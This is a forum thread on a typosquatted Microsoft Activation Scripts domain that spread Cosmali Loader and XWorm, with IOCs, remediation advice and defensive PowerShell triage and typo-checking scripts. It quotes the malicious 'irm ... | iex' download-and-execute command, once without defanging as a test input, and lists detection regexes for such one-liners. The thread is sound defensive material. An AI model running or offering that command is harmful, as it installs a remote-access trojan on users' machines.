Fake MAS Windows activation domain used to spread PowerShell malware

Brownie2019

Mar 9, 2019
A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the 'Cosmali Loader'.
BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.
Full Story:
This looks like a straightforward (and very effective) typosquatting campaign: a look‑alike domain was used to serve a malicious PowerShell payload to people trying to run MAS, leading to “Cosmali Loader” infections. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))

What happened (high level)
  • Users intended to use the MAS “get.activated.win” domain, but mistyped it as “get.activate[.]win” (missing the “d”). ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))
  • That typo domain served malicious PowerShell, and affected users started seeing “Cosmali Loader” warning popups. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))
  • Per the reporting, Cosmali Loader has been associated with follow-on payloads like cryptominers and the XWorm RAT (remote access trojan). ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))

If someone ran the wrong command/domain
I can’t safely tell from a screenshot or a popup alone whether a specific machine is infected, but if the mistyped domain was executed in PowerShell, it should be treated as a likely compromise and handled accordingly. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))

  • Immediately disconnect the PC from the network (Wi‑Fi/Ethernet) to limit further remote access/exfiltration.
  • From a clean device, change passwords for email, banking, Microsoft account, and any password manager; revoke active sessions where possible; enable MFA.
  • Preserve what you must (documents/photos only). Avoid backing up executables/scripts from the potentially infected system.
  • Best-practice remediation: do a clean Windows reinstall from known-good media. With loader/RAT-style threats, “cleaning” isn’t always something you can trust 100%. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))
  • After reinstall, update Windows fully, update browsers, and re-install apps from official sources only.

If they want to confirm/triage before wiping
  • Run a full scan with Microsoft Defender (including an Offline scan if available) and a reputable second opinion scanner (e.g., Malwarebytes).
  • Check for suspicious persistence with Sysinternals tools like Autoruns and Process Explorer (scheduled tasks, Run keys, odd PowerShell child processes, unusual services).
  • If they want guided cleanup, have them post in the Malware Removal section with proper diagnostic logs (e.g., FRST) so trained helpers can review what’s actually on the system.

Prevention takeaway
This is a good real-world reminder that piping remote scripts into an elevated shell is high-risk—typosquatting turns a one-character mistake into code execution. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/))
 
The infection vector relies entirely on user error (typos) during the execution of a command-line script.

Typosquatting Vector

Legitimate Domain
get.activated.win

(Note the "d")

Malicious Domain
get.activate[.]win

(Missing the "d")

Infection Chain

User launches PowerShell as Administrator.

User types the command using the fake domain
(irm https://get.activate[.]win | iex).

The malicious server delivers a PowerShell script that downloads the Cosmali Loader.

Payloads

The loader deploys XWorm (Remote Access Trojan) for persistent access and data exfiltration, along with potential cryptomining modules.

Unusual Indicator (Grey-Hat Intervention)

Some victims have reported seeing a popup message stating,
"You have been infected by a malware called 'cosmali loader'...".
This message appears to have been pushed by a security researcher who compromised the attackers' insecure Command & Control (C2) panel to warn victims.

Indicators of Compromise (IOCs)

Network Indicators

URL: hxxps[:]//get[.]activate[.]win

Domain: get[.]activate[.]win

Behavioral Indicators

Messages warning of "Cosmali Loader" infection.

Unexpected CPU/GPU spikes due to background mining.

Unrecognized PowerShell instances or processes masquerading as system tasks (check Task Manager details).

Remediation & Recommendations

If you or a user executed the command with the typo, the system must be treated as fully compromised (RAT infection).

Unplug the Ethernet cable or disable Wi-Fi immediately to sever the attacker's connection to the XWorm RAT.

Assessment

Check Task Manager for high-resource PowerShell processes.

Check Startup Apps and Task Scheduler for unrecognized entries created recently.

Containment & Recovery

Because XWorm is a RAT that grants attackers full control (including the ability to install further persistence), a full wipe and clean reinstall of Windows is the only guaranteed remediation.

Change Passwords: From a different, clean device, change all passwords for accounts logged in on the infected machine (Email, Banking, Microsoft Account).

Prevention

Always copy commands directly from the official repository rather than typing them from memory.
(GitHub: massgravel/Microsoft-Activation-Scripts)

Verify the URL character-by-character before pressing Enter in an administrative terminal.
 
Detected by MD

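A way to run the checks both posts above ask for (PowerShell history, live PowerShell processes and their command lines, scheduled tasks, Run keys and Startup folders) in one pass, as an added example that is not code from the article, from either poster or from the MAS project. It runs in an elevated PowerShell on the suspect host and only reports; the domain strings are the IOCs quoted in the thread, while the 14-day look-back, the path heuristics and the function names are my own assumptions.

```powershell
# Added example (not from the article or the MAS project): read-only triage of the
# persistence and execution points named in the thread. Reports only; cleans nothing.
$Typo    = 'get.activate.win'        # malicious typo domain from the post (written defanged there)
$Since   = (Get-Date).AddDays(-14)   # assumption: how far back "created recently" reaches
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

$Findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Area, [string]$Detail, [string]$Why) {
    $Findings.Add([pscustomobject]@{ Area = $Area; Why = $Why; Detail = $Detail })
}

# Heuristics: the typo domain itself, or a download-and-execute one-liner from any
# host (irm/iwr piped to iex, encoded or hidden-window PowerShell).
function Get-Suspicion([string]$Text) {
    if (-not $Text) { return $null }
    if ($Text -match [regex]::Escape($Typo)) { return 'typo domain' }
    if ($Text -match '(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b.*\|\s*(iex|Invoke-Expression)\b') { return 'remote script piped to iex' }
    if ($Text -match '-(enc|encodedcommand|w\s+hidden|windowstyle\s+hidden)\b') { return 'encoded/hidden PowerShell' }
    return $null
}

# 1. PowerShell command history of every local profile (PSReadLine keeps it on disk).
Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_.FullName
        Get-Content $file -ErrorAction SilentlyContinue | ForEach-Object {
            $why = Get-Suspicion $_
            if ($why) { Add-Finding 'History' "$file : $_" $why }
        }
    }

# 2. Live PowerShell processes with full command lines (Task Manager shows only the name).
Get-CimInstance Win32_Process -Filter "Name LIKE 'powershell%' OR Name LIKE 'pwsh%'" |
    ForEach-Object {
        $why = Get-Suspicion $_.CommandLine
        if ($why) { Add-Finding 'Process' "PID $($_.ProcessId) (parent $($_.ParentProcessId)): $($_.CommandLine)" $why }
    }

# 3. Scheduled tasks: suspicious actions anywhere, plus anything registered recently
#    outside the \Microsoft\ tree (noise reduction; the other heuristics still apply there).
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $task   = $_
    $action = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ; '
    $why    = Get-Suspicion $action
    $created = $null
    if ($task.Date) { try { $created = [datetime]$task.Date } catch { } }
    if (-not $why -and $created -and $created -gt $Since -and $task.TaskPath -notlike '\Microsoft\*') { $why = 'registered recently' }
    if ($why) { Add-Finding 'ScheduledTask' "$($task.TaskPath)$($task.TaskName) -> $action" $why }
}

# 4. Run / RunOnce keys for the machine and the current user.
foreach ($key in $RunKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath and friends
        $value = [string]$p.Value
        $why = Get-Suspicion $value
        if (-not $why -and $value -match '\\(AppData|Temp|ProgramData|Public)\\') { $why = 'runs from user-writable path' }
        if ($why) { Add-Finding 'RunKey' "$key\$($p.Name) = $value" $why }
    }
}

# 5. Startup folders: any file dropped there within the look-back window.
$startup = @("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
             "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp")
Get-ChildItem -Path $startup -File -ErrorAction SilentlyContinue |
    Where-Object { $_.CreationTime -gt $Since } |
    ForEach-Object { Add-Finding 'Startup' $_.FullName 'created recently' }

if ($Findings.Count -eq 0) { 'No indicators found by these checks (which does not prove the host is clean).' }
else { $Findings | Sort-Object Area | Format-Table -AutoSize -Wrap }
```

An empty result only means these specific places are quiet; a RAT can persist in ways this pass does not look at, which is why the posts above still recommend a clean reinstall once the typo command was actually run. Save the output before wiping if you want helpers in the Malware Removal section to see what was there.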
 
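The "verify the URL character-by-character" advice can be turned into a habit-enforcing check: before a pasted one-liner is run, compare every host name in it against a list of domains you have already verified and refuse anything that is only a character or two away from one of them. This is an added example, not code from the article or from the MAS project; the verified-domain list holds the legitimate domain named in the post, and the function names and the distance threshold are my own choices.

```powershell
# Added example (not from the article or the MAS project): reject near-miss domains
# before a remote one-liner is executed. Only the domain from the post is "verified".
$KnownGood = @('get.activated.win')   # legitimate MAS domain per the post; extend with your own verified hosts
$MaxTypoDistance = 2                  # assumption: 1-2 edits away from a verified host is treated as a typo

function Get-EditDistance([string]$a, [string]$b) {
    # Levenshtein distance: single-character inserts, deletes or substitutions
    # needed to turn $a into $b (dropping one letter from a domain is distance 1).
    $a = $a.ToLowerInvariant(); $b = $b.ToLowerInvariant()
    $d = [int[,]]::new($a.Length + 1, $b.Length + 1)
    for ($i = 0; $i -le $a.Length; $i++) { $d[$i, 0] = $i }
    for ($j = 0; $j -le $b.Length; $j++) { $d[0, $j] = $j }
    for ($i = 1; $i -le $a.Length; $i++) {
        for ($j = 1; $j -le $b.Length; $j++) {
            $cost = if ($a[$i - 1] -eq $b[$j - 1]) { 0 } else { 1 }
            $d[$i, $j] = [Math]::Min([Math]::Min($d[($i - 1), $j] + 1, $d[$i, ($j - 1)] + 1),
                                     $d[($i - 1), ($j - 1)] + $cost)
        }
    }
    return $d[$a.Length, $b.Length]
}

function Test-RemoteCommand([string]$Command) {
    # Pull every host name out of the URLs in the command and give each a verdict.
    $hosts = [regex]::Matches($Command, 'https?://([A-Za-z0-9.-]+)') |
        ForEach-Object { $_.Groups[1].Value.ToLowerInvariant() }
    if (-not $hosts) { return [pscustomobject]@{ Host = $null; Nearest = $null; Distance = $null; Verdict = 'no URL in command' } }
    foreach ($h in $hosts) {
        if ($KnownGood -contains $h) {
            $nearest = $h; $dist = 0; $verdict = 'verified'
        } else {
            $nearest = $KnownGood | Sort-Object { Get-EditDistance $h $_ } | Select-Object -First 1
            $dist    = Get-EditDistance $h $nearest
            $verdict = if ($dist -le $MaxTypoDistance) { "BLOCK: looks like a typo of $nearest" }
                       else { 'unknown host, not on the verified list' }
        }
        [pscustomobject]@{ Host = $h; Nearest = $nearest; Distance = $dist; Verdict = $verdict }
    }
}

# Constructed inputs: the legitimate form and the one-character typo described in the post.
Test-RemoteCommand 'irm https://get.activated.win | iex'
Test-RemoteCommand 'irm https://get.activate.win | iex'
```

The first command comes back as verified, the second as a near-miss of get.activated.win that should be blocked. Wire the check in front of whatever wrapper you use to run such one-liners, or just run it on the clipboard contents before pasting into an elevated prompt; it does not make piping a remote script into an administrative shell safe, it only stops the one-character mistake this thread is about.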
People have to be very careless to get infected by this. A simple Google search for "Microsoft Activation Scripts" brings up the official website and GitHub as the top two links:


 
Honestly, people buying Starbucks for $10 and not willing to pay $2 for a licence deserve to be hacked. They most likely do not tip either. 🙃

Yeah, but you have to admit Frappuccinos are awesome. The days of using KMS and the like are gone; just buy a cheap $10 Win 11 Pro license from the grey market.
 